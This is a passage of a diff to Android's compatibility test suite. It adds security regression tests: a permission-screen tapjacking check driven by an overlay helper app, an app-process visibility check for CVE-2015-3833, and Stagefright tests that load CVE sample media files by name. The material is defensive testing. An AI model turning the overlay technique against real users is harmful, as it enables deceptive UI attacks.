+ * Tests permission review screen can't be tapjacked
+ */
+class PermissionReviewTapjackingTest {
+
+ companion object {
+ const val APK_DIRECTORY = "/data/local/tmp/cts/permission3"
+ const val IDLE_TIMEOUT_MILLIS: Long = 1000
+ const val TIMEOUT_MILLIS: Long = 20000
+
+ const val APP_APK_PATH_22 = "$APK_DIRECTORY/CtsUsePermissionApp22_2.apk"
+ const val APP_PACKAGE_NAME = "android.permission3.cts.usepermission"
+
+ const val HELPER_APP_OVERLAY = "$APK_DIRECTORY/CtsHelperAppOverlay.apk"
+ private const val HELPER_PACKAGE_NAME = "android.permission3.cts.helper.overlay"
+ }
+
+ protected val instrumentation: Instrumentation = InstrumentationRegistry.getInstrumentation()
+ protected val context: Context = instrumentation.context
+ protected val uiAutomation: UiAutomation = instrumentation.uiAutomation
+ protected val uiDevice: UiDevice = UiDevice.getInstance(instrumentation)
+ protected val packageManager: PackageManager = context.packageManager
+
+ private var screenTimeoutBeforeTest: Long = 0
+
+ protected fun waitForIdle() = uiAutomation.waitForIdle(IDLE_TIMEOUT_MILLIS, TIMEOUT_MILLIS)
+
+ protected fun waitFindObject(selector: BySelector): UiObject2 {
+ waitForIdle()
+ val view = uiDevice.wait(Until.findObject(selector), TIMEOUT_MILLIS)
+ if (view == null) {
+ throw RuntimeException("View not found after waiting for " +
+ "${TIMEOUT_MILLIS}ms: $selector")
+ }
+ return view
+ }
+
+ protected fun installPackage(
+ apkPath: String,
+ reinstall: Boolean = false,
+ expectSuccess: Boolean = true
+ ) {
+ val output = runShellCommand("pm install${if (reinstall) " -r" else ""} $apkPath").trim()
+ if (expectSuccess) {
+ Assert.assertEquals("Success", output)
+ } else {
+ Assert.assertNotEquals("Success", output)
+ }
+ }
+
+ protected fun pressHome() {
+ uiDevice.pressHome()
+ waitForIdle()
+ }
+
+ @Before
+ fun setUp() {
+ runWithShellPermissionIdentity {
+ screenTimeoutBeforeTest = Settings.System.getLong(
+ context.contentResolver, Settings.System.SCREEN_OFF_TIMEOUT
+ )
+ Settings.System.putLong(
+ context.contentResolver, Settings.System.SCREEN_OFF_TIMEOUT, 1800000L
+ )
+ }
+
+ uiDevice.wakeUp()
+ runShellCommand(instrumentation, "wm dismiss-keyguard")
+
+ uiDevice.findObject(By.text("Close"))?.click()
+ }
+
+ @Before
+ fun installApp22AndApprovePermissionReview() {
+ assumeFalse(packageManager.arePermissionsIndividuallyControlled())
+
+ installPackage(APP_APK_PATH_22)
+ installPackage(HELPER_APP_OVERLAY)
+
+ runShellCommand(
+ "appops set $HELPER_PACKAGE_NAME android:system_alert_window allow")
+ }
+
+ @After
+ fun tearDown() {
+ runWithShellPermissionIdentity {
+ Settings.System.putLong(
+ context.contentResolver, Settings.System.SCREEN_OFF_TIMEOUT,
+ screenTimeoutBeforeTest
+ )
+ }
+
+ pressHome()
+ }
+
+ @After
+ fun uninstallPackages() {
+ runShellCommand("pm uninstall $APP_PACKAGE_NAME")
+ runShellCommand("pm uninstall $HELPER_PACKAGE_NAME")
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = [176094367])
+ fun testOverlaysAreHidden() {
+ context.startActivity(Intent()
+ .setComponent(ComponentName(HELPER_PACKAGE_NAME,
+ "$HELPER_PACKAGE_NAME.OverlayActivity"))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK))
+ findOverlay()
+
+ context.startActivity(Intent()
+ .setComponent(ComponentName(APP_PACKAGE_NAME,
+ "$APP_PACKAGE_NAME.FinishOnCreateActivity"))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
+ )
+
+ waitFindObject(By.res("com.android.permissioncontroller:id/permissions_message"))
+
+ try {
+ findOverlay()
+ Assert.fail("Overlay was displayed")
+ } catch (e: Exception) {
+ // expected
+ }
+
+ System.out.println("pressHome!")
+ pressHome()
+ findOverlay()
+ }
+
+ private fun findOverlay() = waitFindObject(By.text("Find me!"))
+}
diff --git a/tests/tests/security/src/android/security/cts/RunningAppProcessInfoTest.java b/tests/tests/security/src/android/security/cts/RunningAppProcessInfoTest.java
index 293200e5541..a46e142e4d5 100644
--- a/tests/tests/security/src/android/security/cts/RunningAppProcessInfoTest.java
+++ b/tests/tests/security/src/android/security/cts/RunningAppProcessInfoTest.java
@@ -16,17 +16,21 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.app.ActivityManager;
import android.content.Context;
import android.platform.test.annotations.AsbSecurityTest;
+
import androidx.test.runner.AndroidJUnit4;
+
import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
-import org.junit.runner.RunWith;
-import org.junit.Test;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
import java.util.List;
+import java.util.stream.Collectors;
@RunWith(AndroidJUnit4.class)
public class RunningAppProcessInfoTest extends StsExtraBusinessLogicTestCase {
@@ -40,12 +44,23 @@ public class RunningAppProcessInfoTest extends StsExtraBusinessLogicTestCase {
@Test
public void testRunningAppProcessInfo() {
ActivityManager amActivityManager =
- (ActivityManager) getInstrumentation().getContext().getSystemService(Context.ACTIVITY_SERVICE);
+ (ActivityManager)
+ getInstrumentation()
+ .getContext()
+ .getSystemService(Context.ACTIVITY_SERVICE);
List<ActivityManager.RunningAppProcessInfo> appList =
amActivityManager.getRunningAppProcesses();
+
+ // Assembles app list for logging
+ List<String> processNames =
+ appList.stream()
+ .map((processInfo) -> processInfo.processName)
+ .collect(Collectors.toList());
+
// The test will pass if it is able to get only its process info
- assertTrue("Device is vulnerable to CVE-2015-3833. For more information, see " +
- "https://android.googlesource.com/platform/frameworks/base/+" +
- "/aaa0fee0d7a8da347a0c47cef5249c70efee209e", (appList.size() == 1));
+ assertTrue(
+ "Device is vulnerable to CVE-2015-3833. Running app processes: "
+ + processNames.toString(),
+ (appList.size() == 1));
}
}
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index efb0624ca40..307a3e7d01e 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -22,14 +22,20 @@
*/
package android.security.cts;
-import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
-import android.app.Instrumentation;
+import static org.hamcrest.Matchers.is;
+import static org.junit.Assert.assertEquals;
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assert.assertNotEquals;
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assert.fail;
+import static org.junit.Assume.assumeFalse;
+import static org.junit.Assume.assumeThat;
+
import android.content.Context;
import android.content.res.AssetFileDescriptor;
import android.content.res.Resources;
import android.graphics.Bitmap;
import android.graphics.BitmapFactory;
-import android.graphics.SurfaceTexture;
import android.media.MediaCodec;
import android.media.MediaCodecInfo;
import android.media.MediaCodecList;
@@ -37,66 +43,51 @@ import android.media.MediaExtractor;
import android.media.MediaFormat;
import android.media.MediaMetadataRetriever;
import android.media.MediaPlayer;
-import android.opengl.GLES20;
-import android.opengl.GLES11Ext;
+import android.media.TimedText;
import android.os.Looper;
+import android.os.Parcel;
import android.os.SystemClock;
import android.platform.test.annotations.AppModeFull;
-import android.os.Parcel;
import android.platform.test.annotations.AsbSecurityTest;
+import android.security.NetworkSecurityPolicy;
import android.util.Log;
import android.view.Surface;
import android.webkit.cts.CtsTestServer;
+import androidx.test.runner.AndroidJUnit4;
+
import com.android.compatibility.common.util.CrashUtils;
import com.android.compatibility.common.util.mainline.MainlineModule;
import com.android.compatibility.common.util.mainline.ModuleDetector;
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.json.JSONArray;
+import org.json.JSONException;
+import org.junit.Rule;
+import org.junit.Test;
+import org.junit.rules.TestName;
+import org.junit.runner.RunWith;
import java.io.BufferedInputStream;
import java.io.BufferedReader;
+import java.io.File;
import java.io.FileInputStream;
+import java.io.FileOutputStream;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStream;
-import java.net.URL;
-import java.nio.ByteBuffer;
-import java.io.FileOutputStream;
-import java.io.ObjectInputStream;
import java.io.OutputStream;
-import java.io.InputStream;
import java.net.BindException;
-import java.net.Socket;
import java.net.ServerSocket;
-import java.io.File;
+import java.net.Socket;
+import java.net.URL;
+import java.nio.ByteBuffer;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.concurrent.locks.Condition;
import java.util.concurrent.locks.ReentrantLock;
import java.util.regex.Pattern;
-import org.json.JSONArray;
-import org.json.JSONException;
-import org.json.JSONObject;
-
-import android.security.cts.R;
-
-import android.security.NetworkSecurityPolicy;
-import android.media.TimedText;
-
-import androidx.test.InstrumentationRegistry;
-import androidx.test.runner.AndroidJUnit4;
-
-import org.junit.Rule;
-import org.junit.rules.TestName;
-import org.junit.Before;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import static org.junit.Assume.*;
-import static org.junit.Assert.*;
-
-import static org.hamcrest.Matchers.is;
-
/**
* Verify that the device is not vulnerable to any known Stagefright
* vulnerabilities.
@@ -1818,6 +1809,48 @@ public class StagefrightTest extends StsExtraBusinessLogicTestCase {
before any existing test methods
***********************************************************/
@Test
+ @AsbSecurityTest(cveBugId = 223209306)
+ public void testStagefright_cve_2022_22085() throws Exception {
+ doStagefrightTest(R.raw.cve_2022_22085);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 223209816)
+ public void testStagefright_cve_2022_22084() throws Exception {
+ doStagefrightTest(R.raw.cve_2022_22084);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 223211218)
+ public void testStagefright_cve_2022_22086() throws Exception {
+ doStagefrightTest(R.raw.cve_2022_22086);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 228101819)
+ public void testStagefright_cve_2022_25659() throws Exception {
+ doStagefrightTest(R.raw.cve_2022_25659);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 223210917)
+ public void testStagefright_cve_2022_22083() throws Exception {
+ doStagefrightTest(R.raw.cve_2022_22083);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 223209610)
+ public void testStagefright_cve_2022_22087() throws Exception {
+ doStagefrightTest(R.raw.cve_2022_22087);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 228101835)
+ public void testStagefright_cve_2022_25657() throws Exception {
+ doStagefrightTest(R.raw.cve_2022_25657);
+ }
+
+ @Test
@AsbSecurityTest(cveBugId = 231156126)
public void testStagefright_cve_2022_22059() throws Exception {
doStagefrightTest(R.raw.cve_2022_22059);
@@ -2415,7 +2448,8 @@ public class StagefrightTest extends StsExtraBusinessLogicTestCase {
MediaCodec.BufferInfo info = new MediaCodec.BufferInfo();
try {
ByteBuffer [] inputBuffers = codec.getInputBuffers();
- while (true) {
+ long startTime = System.nanoTime();
+ while (System.nanoTime() - startTime < TIMEOUT_NS) {
int flags = ex.getSampleFlags();
long time = ex.getSampleTime();
ex.getCachedDuration();
diff --git a/tests/tests/security/test-apps/DummyTargetApi15TestApp/Android.bp b/tests/tests/security/test-apps/DummyTargetApi15TestApp/Android.bp
new file mode 100644
index 00000000000..2cfcd55beae
--- /dev/null
+++ b/tests/tests/security/test-apps/DummyTargetApi15TestApp/Android.bp
@@ -0,0 +1,27 @@
+//
+// Copyright (C) 2022 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CtsDummyTargetApi15TestApp",
+ defaults: ["cts_defaults"],
+ sdk_version: "current",
+ target_sdk_version: "15",
+ min_sdk_version: "15",
+}
diff --git a/tests/tests/security/test-apps/DummyTargetApi15TestApp/AndroidManifest.xml b/tests/tests/security/test-apps/DummyTargetApi15TestApp/AndroidManifest.xml
new file mode 100644
index 00000000000..aa25f1a0713
--- /dev/null
+++ b/tests/tests/security/test-apps/DummyTargetApi15TestApp/AndroidManifest.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ ~ Copyright (C) 2022 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.dummy.api15" >
+ <uses-sdk android:minSdkVersion="15" android:targetSdkVersion="15" />
+ <application android:hasCode="false" android:label="Dummy Test App" />
+</manifest>
diff --git a/tests/tests/security/test-apps/HelperAppOverlay/Android.bp b/tests/tests/security/test-apps/HelperAppOverlay/Android.bp
new file mode 100644
index 00000000000..db0eab89848
--- /dev/null
+++ b/tests/tests/security/test-apps/HelperAppOverlay/Android.bp
@@ -0,0 +1,31 @@
+//
+// Copyright (C) 2020 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CtsHelperAppOverlay",
+ min_sdk_version: "30",
+ srcs: [
+ "src/**/*.kt",
+ ],
+ static_libs: [
+ "kotlin-stdlib",
+ ],
+ certificate: ":cts-testkey2",
+}
diff --git a/tests/tests/security/test-apps/HelperAppOverlay/AndroidManifest.xml b/tests/tests/security/test-apps/HelperAppOverlay/AndroidManifest.xml
new file mode 100644
index 00000000000..04d5a4b4386
--- /dev/null
+++ b/tests/tests/security/test-apps/HelperAppOverlay/AndroidManifest.xml
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2020 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.helper.overlay">
+
+ <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
+
+ <application>
+ <activity android:name=".OverlayActivity" android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ </intent-filter>
+ </activity>
+ </application>
+</manifest>
diff --git a/tests/tests/security/test-apps/HelperAppOverlay/src/android/permission3/cts/helper/overlay/OverlayActivity.kt b/tests/tests/security/test-apps/HelperAppOverlay/src/android/permission3/cts/helper/overlay/OverlayActivity.kt
new file mode 100644
index 00000000000..2c1497fea30
--- /dev/null
+++ b/tests/tests/security/test-apps/HelperAppOverlay/src/android/permission3/cts/helper/overlay/OverlayActivity.kt
@@ -0,0 +1,26 @@
+package android.permission3.cts.helper.overlay
+
+import android.app.Activity
+import android.os.Bundle
+import android.view.ViewGroup
+import android.view.ViewGroup.LayoutParams.MATCH_PARENT
+import android.view.WindowManager
+import android.widget.LinearLayout
+import android.widget.TextView
+
+class OverlayActivity : Activity() {
+
+ override fun onCreate(savedInstanceState: Bundle?) {
+ super.onCreate(savedInstanceState)
+ val mainLayout = LinearLayout(this)
+ mainLayout.layoutParams = ViewGroup.LayoutParams(MATCH_PARENT, MATCH_PARENT)
+ val textView = TextView(this)
+
+ textView.text = "Find me!"
+ mainLayout.addView(textView)
+
+ val windowParams = WindowManager.LayoutParams()
+ windowParams.type = WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY
+ windowManager.addView(mainLayout, windowParams)
+ }
+}
diff --git a/tests/tests/security/test-apps/UsePermissionApp22_2/Android.bp b/tests/tests/security/test-apps/UsePermissionApp22_2/Android.bp
new file mode 100644
index 00000000000..8bda33cbf12
--- /dev/null
+++ b/tests/tests/security/test-apps/UsePermissionApp22_2/Android.bp
@@ -0,0 +1,27 @@
+//
+// Copyright (C) 2015 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+android_test_helper_app {
+ name: "CtsUsePermissionApp22_2",
+ srcs: [
+ ":CtsUsePermissionAppSrc",
+ ],
+ static_libs: [
+ "kotlin-stdlib",
+ ],
+ certificate: ":cts-testkey2",
+ min_sdk_version: "22",
+}
diff --git a/tests/tests/security/test-apps/UsePermissionApp22_2/AndroidManifest.xml b/tests/tests/security/test-apps/UsePermissionApp22_2/AndroidManifest.xml
new file mode 100644
index 00000000000..f1ff90d419c
--- /dev/null
+++ b/tests/tests/security/test-apps/UsePermissionApp22_2/AndroidManifest.xml
@@ -0,0 +1,79 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2015 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.usepermission">
+
+ <uses-sdk android:minSdkVersion="22" android:targetSdkVersion="22" />
+
+ <!-- Make sure permission code can handle invalid permissions -->
+ <uses-permission android:name="android.permission3.cts.usepermission.INVALID_PERMISSION_NAME" />
+
+ <!-- Request two different permissions within the same group -->
+ <uses-permission android:name="android.permission.SEND_SMS" />
+ <uses-permission android:name="android.permission.RECEIVE_SMS" />
+
+ <!-- Contacts -->
+ <!-- Deliberately request WRITE_CONTACTS but *not* READ_CONTACTS -->
+ <uses-permission android:name="android.permission.WRITE_CONTACTS" />
+
+ <!-- Calendar -->
+ <uses-permission android:name="android.permission.READ_CALENDAR" />
+ <uses-permission android:name="android.permission.WRITE_CALENDAR" />
+
+ <!-- SMS -->
+ <uses-permission android:name="android.permission.SEND_SMS" />
+ <uses-permission android:name="android.permission.RECEIVE_SMS" />
+ <uses-permission android:name="android.permission.READ_SMS" />
+ <uses-permission android:name="android.permission.RECEIVE_WAP_PUSH" />
+ <uses-permission android:name="android.permission.RECEIVE_MMS" />
+ <uses-permission android:name="android.permission.READ_CELL_BROADCASTS" />
+
+ <!-- Storage -->
+ <!-- Special case: WRITE_EXTERNAL_STORAGE implies READ_EXTERNAL_STORAGE -->
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+
+ <!-- Location -->
+ <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
+ <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
+
+ <!-- Phone -->
+ <uses-permission android:name="android.permission.READ_PHONE_STATE" />
+ <uses-permission android:name="android.permission.CALL_PHONE" />
+ <uses-permission android:name="android.permission.READ_CALL_LOG" />
+ <uses-permission android:name="android.permission.WRITE_CALL_LOG" />
+ <uses-permission android:name="com.android.voicemail.permission.ADD_VOICEMAIL" />
+ <uses-permission android:name="android.permission.USE_SIP" />
+ <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />
+
+ <!-- Phone -->
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
+
+ <!-- Camera -->
+ <uses-permission android:name="android.permission.CAMERA" />
+
+ <!-- Body Sensors -->
+ <uses-permission android:name="android.permission.BODY_SENSORS" />
+
+ <application>
+ <activity android:name=".CheckCalendarAccessActivity" android:exported="true" />
+ <activity android:name=".FinishOnCreateActivity" android:exported="true" />
+ <activity android:name=".RequestPermissionsActivity" android:exported="true" />
+ </application>
+</manifest>
diff --git a/tests/tests/telecom/Android.bp b/tests/tests/telecom/Android.bp
index 437743abcf3..c056b0a048d 100644
--- a/tests/tests/telecom/Android.bp
+++ b/tests/tests/telecom/Android.bp
@@ -76,6 +76,7 @@ android_test {
"Api29InCallServiceTestApp/**/I*.aidl",
"ThirdPtyDialerTestApp/**/*.java",
"ThirdPtyDialerTestAppTwo/**/*.java",
+ "CarModeTestAppSelfManaged/**/*.java",
"CarModeTestAppTwo/**/*.java",
],
exclude_srcs: [
diff --git a/tests/tests/telecom/AndroidTest.xml b/tests/tests/telecom/AndroidTest.xml
index 6f51e4a3029..13e1e1adeff 100644
--- a/tests/tests/telecom/AndroidTest.xml
+++ b/tests/tests/telecom/AndroidTest.xml
@@ -27,6 +27,7 @@
<option name="test-file-name" value="ThirdPtyInCallServiceTestApp.apk" />
<option name="test-file-name" value="Api29InCallServiceTestApp.apk" />
<option name="test-file-name" value="CallScreeningServiceTestApp.apk" />
+ <option name="test-file-name" value="CarModeTestAppSelfManaged.apk" />
<option name="test-file-name" value="CarModeTestApp.apk" />
<option name="test-file-name" value="CarModeTestAppTwo.apk" />
<option name="test-file-name" value="ThirdPtyDialerTestApp.apk" />
diff --git a/tests/tests/telecom/CarModeTestAppSelfManaged/Android.bp b/tests/tests/telecom/CarModeTestAppSelfManaged/Android.bp
new file mode 100644
index 00000000000..edc9f63972a
--- /dev/null
+++ b/tests/tests/telecom/CarModeTestAppSelfManaged/Android.bp
@@ -0,0 +1,38 @@
+// Copyright (C) 2019 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CarModeTestAppSelfManaged",
+ defaults: ["cts_defaults"],
+ srcs: [
+ "src/**/*.java",
+ ":car-mode-app-srcs",
+ ":car-mode-app-aidl",
+ ],
+ static_libs: [
+ "compatibility-device-util-axt",
+ "ctstestrunner-axt",
+ "androidx.test.rules",
+ "CtsTelecomMockLib",
+ ],
+ sdk_version: "test_current",
+ test_suites: [
+ "cts",
+ "general-tests",
+ ],
+}
diff --git a/tests/tests/telecom/CarModeTestAppSelfManaged/AndroidManifest.xml b/tests/tests/telecom/CarModeTestAppSelfManaged/AndroidManifest.xml
new file mode 100644
index 00000000000..c792dfd9913
--- /dev/null
+++ b/tests/tests/telecom/CarModeTestAppSelfManaged/AndroidManifest.xml
@@ -0,0 +1,59 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2019 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.telecom.cts.carmodetestappselfmanaged"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <uses-permission android:name="android.permission.MANAGE_OWN_CALLS" />
+ <uses-permission android:name="android.permission.BIND_TELECOM_CONNECTION_SERVICE" />
+
+ <application android:label="CarModeTestAppSelfManaged">
+ <service android:name=".CtsCarModeInCallServiceSelfManaged"
+ android:permission="android.permission.BIND_INCALL_SERVICE"
+ android:launchMode="singleInstance"
+ android:exported="true">
+ <meta-data android:name="android.telecom.IN_CALL_SERVICE_CAR_MODE_UI"
+ android:value="true"/>
+ <meta-data android:name="android.telecom.INCLUDE_EXTERNAL_CALLS"
+ android:value="true" />
+ <meta-data android:name="android.telecom.INCLUDE_SELF_MANAGED_CALLS"
+ android:value="true" />
+ <intent-filter>
+ <action android:name="android.telecom.InCallService"/>
+ </intent-filter>
+ </service>
+
+ <service android:name=".CtsCarModeInCallServiceControlSelfManaged"
+ android:launchMode="singleInstance"
+ android:exported="true">
+ <intent-filter>
+ <action
+ android:name="android.telecom.cts.carmodetestapp.ACTION_CAR_MODE_CONTROL"/>
+ </intent-filter>
+ </service>
+
+ <service android:name="android.telecom.cts.CtsSelfManagedConnectionService"
+ android:permission="android.permission.BIND_TELECOM_CONNECTION_SERVICE"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.telecom.ConnectionService"/>
+ </intent-filter>
+ </service>
+
+ </application>
+</manifest> \ No newline at end of file
diff --git a/tests/tests/telecom/CarModeTestAppSelfManaged/src/android/telecom/cts/carmodetestappselfmanaged/CtsCarModeInCallServiceControlSelfManaged.java b/tests/tests/telecom/CarModeTestAppSelfManaged/src/android/telecom/cts/carmodetestappselfmanaged/CtsCarModeInCallServiceControlSelfManaged.java
new file mode 100644
index 00000000000..b6d5c10a9c8
--- /dev/null
+++ b/tests/tests/telecom/CarModeTestAppSelfManaged/src/android/telecom/cts/carmodetestappselfmanaged/CtsCarModeInCallServiceControlSelfManaged.java
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.telecom.cts.carmodetestappselfmanaged;
+
+import android.telecom.cts.carmodetestapp.CtsCarModeInCallServiceControl;
+
+public class CtsCarModeInCallServiceControlSelfManaged extends CtsCarModeInCallServiceControl {
+}
diff --git a/tests/tests/telecom/CarModeTestAppSelfManaged/src/android/telecom/cts/carmodetestappselfmanaged/CtsCarModeInCallServiceSelfManaged.java b/tests/tests/telecom/CarModeTestAppSelfManaged/src/android/telecom/cts/carmodetestappselfmanaged/CtsCarModeInCallServiceSelfManaged.java
new file mode 100644
index 00000000000..e7b29e30e51
--- /dev/null
+++ b/tests/tests/telecom/CarModeTestAppSelfManaged/src/android/telecom/cts/carmodetestappselfmanaged/CtsCarModeInCallServiceSelfManaged.java
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) 2019 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.telecom.cts.carmodetestappselfmanaged;
+
+import android.telecom.cts.carmodetestapp.CtsCarModeInCallService;
+
+public class CtsCarModeInCallServiceSelfManaged extends CtsCarModeInCallService {
+}
diff --git a/tests/tests/telecom/aidl/android/telecom/cts/carmodetestapp/ICtsCarModeInCallServiceControl.aidl b/tests/tests/telecom/aidl/android/telecom/cts/carmodetestapp/ICtsCarModeInCallServiceControl.aidl
index 5357afb2a30..ad6e41f3606 100644
--- a/tests/tests/telecom/aidl/android/telecom/cts/carmodetestapp/ICtsCarModeInCallServiceControl.aidl
+++ b/tests/tests/telecom/aidl/android/telecom/cts/carmodetestapp/ICtsCarModeInCallServiceControl.aidl
@@ -27,4 +27,6 @@ interface ICtsCarModeInCallServiceControl {
boolean requestAutomotiveProjection();
void releaseAutomotiveProjection();
boolean checkBindStatus(boolean bind);
+ void registerPhoneAccount(in PhoneAccount phoneAccount);
+ void unregisterPhoneAccount(in PhoneAccountHandle phoneAccountHandle);
}
diff --git a/tests/tests/telecom/src/android/telecom/cts/PhoneAccountRegistrarTest.java b/tests/tests/telecom/src/android/telecom/cts/PhoneAccountRegistrarTest.java
new file mode 100644
index 00000000000..f52b183875d
--- /dev/null
+++ b/tests/tests/telecom/src/android/telecom/cts/PhoneAccountRegistrarTest.java
@@ -0,0 +1,461 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
